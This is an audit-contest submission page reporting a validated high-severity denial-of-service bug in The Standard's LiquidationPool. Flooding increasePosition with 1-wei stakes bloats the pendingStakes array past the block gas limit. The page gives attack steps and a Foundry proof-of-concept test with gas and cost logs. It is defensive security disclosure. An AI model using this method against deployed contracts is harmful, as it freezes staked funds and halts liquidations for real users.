The Standard

DeFiHardhat

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

`LiquidationPool::increasePosition` can be spammed to make the `LiquidationPool::pendingStakes` too big, casuing a Denial of Service on increasing and decreasing positions and Liquidations

0xnightfall

Summary

An Attacker can perform a Denial of Service attack on the protocol.

By Spamming the LiquidationPool::increasePosition function with just 1 wei worth of EUROs or TST, an attacker can create a lot of pendingStakes. This makes the gas cost of looping through the pendingStakes array, more than the block gas limit.

The pendingStakes array is looped through in the functions

- `LiquidationPool::consolidatePendingStakes()`
- `LiquidationPool::getTstTotal()`

Vulnerability Details

Proof of Concept:

An attacker has to do the following steps to exploit this issue. A well-funded attacker with enough ETH for gas can do the following to DOS the protocol.

Create a contract which will spam the LiquidationPool::increasePosition() function.
Transfer a small amount of EUROs or TST to the attack contract
Call the increasePosition with 1 wei of TST or EUROs.
If the attack completes within 24 hrs then the Denial of Service attack is successful.

Proof of Code

function test_SpammingIncreasePosition() external {

uint256 GAS_PRICE = 10 gwei; // set the gas price to 10 gwei

uint BLOCK_GAS_LIMIT = 30_000_000;

vm.txGasPrice(GAS_PRICE);

vm.startPrank(0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266);

tst.approve(address(liquidationPool), 1000 ether);

uint gasUsed;

uint gasConsumedForAttack;

uint tstOrEuroNeed;

while (gasUsed <= BLOCK_GAS_LIMIT) {

uint priorGas = gasleft();

liquidationPool.increasePosition(1, 0);

uint postGas = gasleft();

uint _gasUsed = priorGas - postGas;

gasUsed = _gasUsed;

gasConsumedForAttack += _gasUsed;

tstOrEuroNeed++;

}

console2.log("Gas used- ", gasUsed);

console2.log("Gas cost in wei- ", gasUsed * GAS_PRICE);

console2.log("Gas needed for attack- ", gasConsumedForAttack * GAS_PRICE);

console2.log("TST or Euro needed in Wei- ", tstOrEuroNeed);

vm.stopPrank();

}

Results

Logs:

Gas used- 30001910

Gas cost in wei- 300019100000000000

Wei needed for attack- 2410322635710000000000

TST or Euro needed in Wei- 18058

Impact

his creates a Denial of Service attack the following functions

- `LiquidationPool::increasePosition()`
- `LiquidationPool::decreasePosition()`
- `LiquidationPool::distributeFees()`
- `LiquidationPool::distributeAssets()`

This stops all the Liquidations of the Collateral in smartVaults, leading to bad debt throughout the system.

This also affect increasing and decreasing staking positions in the LiquidationPool contract. Thus also making the staked assets in the LiquidationPool stuck in the contract.

Tools Used

Foundry

Updates

Lead Judging Commences

hrishibhat Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

pendingstake-dos

hrishibhat Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

pendingstake-high

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

609

33 USDC / LOC

High Medium

17,500 USDC

Low

2,500 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.